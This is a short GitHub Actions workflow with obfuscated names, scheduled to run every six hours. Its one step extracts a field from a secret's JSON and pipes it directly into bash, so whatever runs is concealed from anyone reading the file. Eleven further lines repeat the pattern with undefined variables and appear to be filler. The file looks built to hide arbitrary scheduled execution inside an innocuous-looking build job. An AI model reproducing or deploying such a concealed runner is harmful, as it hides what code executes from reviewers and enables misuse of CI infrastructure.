name: duoknk

on:
  workflow_dispatch:
  schedule:
    - cron: '0 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duoknk
        env:
          ku347: ${{ secrets.ku347 }}
        run: |
          echo $ku347 | jq -r .b0 | /bin/bash
          echo $q5 | jq -r .hmi315 | /bin/bash
          echo $it2 | jq -r .lu5 | /bin/bash
          echo $mia1 | jq -r .byk2216 | /bin/bash
          echo $d1799 | jq -r .l10479 | /bin/bash
          echo $xzv362 | jq -r .hyp95 | /bin/bash
          echo $zkzd6 | jq -r .a32 | /bin/bash
          echo $ytu96 | jq -r .ub871 | /bin/bash
          echo $nu08983 | jq -r .e728 | /bin/bash
          echo $df9 | jq -r .yjpa14 | /bin/bash
          echo $rumxd26 | jq -r .el25023 | /bin/bash
          echo $nyvgb25 | jq -r .gzv91888 | /bin/bash

